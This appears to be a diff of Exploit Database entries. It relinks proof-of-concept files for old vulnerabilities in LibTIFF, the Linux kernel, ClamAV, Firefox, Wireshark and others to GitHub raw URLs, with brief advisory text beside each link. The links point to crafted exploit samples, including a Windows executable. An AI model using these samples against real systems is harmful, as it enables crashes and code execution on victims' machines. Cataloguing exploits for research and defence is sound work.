An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library.
http://www.exploit-db.com/sploits/27762-1.tiff.0
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-1.tiff.0
http://www.exploit-db.com/sploits/27762-2.tiff.1
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-2.tiff.1
http://www.exploit-db.com/sploits/27762-3.tiff.100
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-3.tiff.100

@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab
An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions.
http://www.exploit-db.com/sploits/27764.tiff.11
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27764.tiff.11


@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability;
Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible.
http://www.exploit-db.com/sploits/27765.tiff.2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27765.tiff.2


@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s
This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected.
http://www.exploit-db.com/sploits/27925.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27925.tgz


@ -8,4 +8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t
ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected.
http://www.exploit-db.com/sploits/28348.exe
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28348.exe
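Review bot: this link delivers a Windows executable (28348.exe), and of all the relinked artifacts it is the one where a published hash matters most: a raw link under `master` gives the reader no way to confirm the binary downloaded is the one the advisory text refers to. Suggest adding a SHA-256 beside the link in this entry.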


@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe
Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected.
http://www.exploit-db.com/sploits/28358.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28358.tar.gz


@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex
AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected.
http://www.exploit-db.com/sploits/28367.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28367.zip


@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the
Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected.
http://www.exploit-db.com/sploits/28380.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28380.zip


@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of
ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue.
http://www.exploit-db.com/sploits/28383.sgi
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28383.sgi


@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex
Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected.
http://www.exploit-db.com/sploits/28384.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28384.zip


@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
http://www.exploit-db.com/sploits/28895.img.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28895.img.gz


@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue
An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
http://www.exploit-db.com/sploits/28912.iso.bz2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28912.iso.bz2


@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie
An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service.
http://www.exploit-db.com/sploits/29399.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29399.pdf


@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab
An attacker can exploit this issue to crash applications on a victim's computer.
http://www.exploit-db.com/sploits/29520.mbox
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29520.mbox


@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected.
GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image.
http://www.exploit-db.com/sploits/29723.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29723.zip


@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour
PulseAudio 0.9.5 is vulnerable to this issue.
http://www.exploit-db.com/sploits/29809.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29809.zip


@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi
Versions of libexif prior to 0.6.14 are vulnerable to this issue.
http://www.exploit-db.com/sploits/30024.jpg
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30024.jpg


@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the
This issue affects versions prior to AlsaPlayer 0.99.80-rc3.
http://www.exploit-db.com/sploits/30648.ogg
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg


@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o
LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30776.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30776.zip


@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th
QEMU 0.9.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30837.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30837.rar


@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary
These issues affect PeerCast 0.12.17, SVN 334 and prior versions.
http://www.exploit-db.com/sploits/30894.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30894.zip


@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le
These issues affect GStreamer 0.10.15; other versions may also be vulnerable.
http://www.exploit-db.com/sploits/31018-1.mpg
http://www.exploit-db.com/sploits/31018-2.mpg
http://www.exploit-db.com/sploits/31018-3.m2v
http://www.exploit-db.com/sploits/31018-4.m2v
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-1.mpg
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-2.mpg
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-3.m2v
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-4.m2v


@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an
Versions prior to SDL_image 1.2.7 are vulnerable.
http://www.exploit-db.com/sploits/31054.gif
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31054.gif


@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected
This issue affects freeSSHd 1.2.0 and prior versions.
http://www.exploit-db.com/sploits/31218.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31218.zip


@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31552.pcap
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31552.pcap


@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31553.pcap
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31553.pcap


@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31554.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31554.gz


@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting
This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected.
http://www.exploit-db.com/sploits/31984.jpg
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31984.jpg


@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images.
According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable.
http://www.exploit-db.com/sploits/32018.svg
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32018.svg


@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio
Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service.
http://www.exploit-db.com/sploits/32019.iki
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32019.iki


@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.
UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available.
http://www.exploit-db.com/sploits/32452.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32452.zip


@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg
QNX RTOS 6.4.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/32740.bin
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32740.bin


@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t
This issue affects versions prior to Linux kernel 2.6.27.14.
http://www.exploit-db.com/sploits/32775.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32775.gz


@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications
These issues affect versions prior to Poppler 0.10.4.
http://www.exploit-db.com/sploits/32800.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32800.pdf


@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/32856.aac
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32856.aac


@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/32857.ogm
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32857.ogm


@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected.
NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely.
http://www.exploit-db.com/sploits/33017.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33017.pdf


@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
http://www.exploit-db.com/sploits/33049.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33049.zip

Some files were not shown because too many files have changed in this diff.